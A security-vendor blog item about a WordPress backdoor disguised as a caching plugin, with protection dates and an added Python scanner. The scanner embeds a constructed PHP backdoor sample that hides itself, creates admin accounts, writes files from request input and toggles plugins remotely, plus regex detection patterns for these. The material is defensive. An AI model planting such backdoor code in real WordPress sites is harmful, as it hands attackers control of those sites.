Backdoor Masquerading as Legitimate Plugin

Today, we would like to share a type of malware that serves as a sophisticated backdoor, capable of performing a variety of tasks while masquerading as a real plugin. Complete with a professional-looking opening comment implying it is a caching plugin, this rogue code contains numerous functions: it adds filters to keep itself out of the list of activated plugins, it has pinging functionality that lets a malicious actor check whether the script is still operational, and it can modify files. Additionally, it offers the ability to create an admin account and to remotely activate and deactivate plugins.
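As an added defensive illustration (not Wordfence's signature and not the malware sample itself), the following static scanner flags plugin source that combines the behaviours described above. The WordPress hook names (`all_plugins`, `pre_option_active_plugins`) and the constructed sample text are assumptions about how such hiding would typically be implemented, not details taken from the post.

```python
import re

# Constructed sample (not the real malware): a fake caching-plugin header followed by
# the capability set described in the post. Hook names are assumed, not from the post.
SAMPLE_PLUGIN = r'''<?php
/*
Plugin Name: Super Cache Helper
Description: Speeds up your site by caching pages.
*/
add_filter('all_plugins', function($plugins) { unset($plugins['cache-helper/cache-helper.php']); return $plugins; });
add_filter('pre_option_active_plugins', 'hide_self_from_active');
if (isset($_GET['ping'])) { echo 'alive'; exit; }
if (isset($_POST['u'])) { $id = wp_create_user($_POST['u'], $_POST['p']); $user = new WP_User($id); $user->set_role('administrator'); }
if (isset($_POST['w'])) { file_put_contents($_POST['f'], $_POST['w']); }
if (isset($_POST['act'])) { activate_plugin($_POST['act']); }
if (isset($_POST['deact'])) { deactivate_plugins($_POST['deact']); }
'''

# Constructed benign plugin used as a control case.
CLEAN_PLUGIN = r'''<?php
/*
Plugin Name: Hello Footer
*/
add_action('wp_footer', function() { echo '<p>Thanks for visiting.</p>'; });
'''

# (label, regex). Some indicators are benign on their own; hiding from the plugin list
# is treated as decisive because legitimate plugins have no reason to do it.
INDICATORS = [
    ("hides from plugin list", r"add_filter\s*\(\s*['\"](all_plugins|pre_option_active_plugins|option_active_plugins)['\"]"),
    ("creates user from request input", r"wp_create_user\s*\([^;]*\$_(GET|POST|REQUEST)"),
    ("grants administrator role", r"set_role\s*\(\s*['\"]administrator['\"]"),
    ("writes files from request input", r"file_put_contents\s*\([^;]*\$_(GET|POST|REQUEST)"),
    ("remote plugin (de)activation", r"(activate_plugin|deactivate_plugins)\s*\([^;]*\$_(GET|POST|REQUEST)"),
    ("ping/alive beacon", r"\$_(GET|POST|REQUEST)\[['\"]ping['\"]\]"),
]

def scan_plugin_source(source: str) -> list:
    """Return the labels of all indicators present in the given PHP source text."""
    return [label for label, pattern in INDICATORS if re.search(pattern, source)]

def is_suspicious(source: str, threshold: int = 2) -> bool:
    """Flag a file if it hides from the plugin list or shows at least `threshold` indicators."""
    hits = scan_plugin_source(source)
    return "hides from plugin list" in hits or len(hits) >= threshold

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_PLUGIN), ("clean", CLEAN_PLUGIN)):
        print(name, is_suspicious(src), scan_plugin_source(src))
```

Run it over every `.php` file under `wp-content/plugins/` and review any flagged file by hand; a hit on the hiding indicator alone is worth investigating even when the plugin header looks legitimate.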

The sample was discovered during a site clean by one of the analysts at Wordfence on July 18, 2023. A signature was developed by the same analyst the following day and released to production within two weeks after undergoing testing. Customers using the free version of Wordfence received this signature after a 30-day delay, on September 1, 2023.

Users of Wordfence Premium are protected against the use of this backdoor via a firewall rule as of October 9, 2023. Users of the free version of Wordfence will receive the firewall rule on November 9, 2023.

Source and more details:
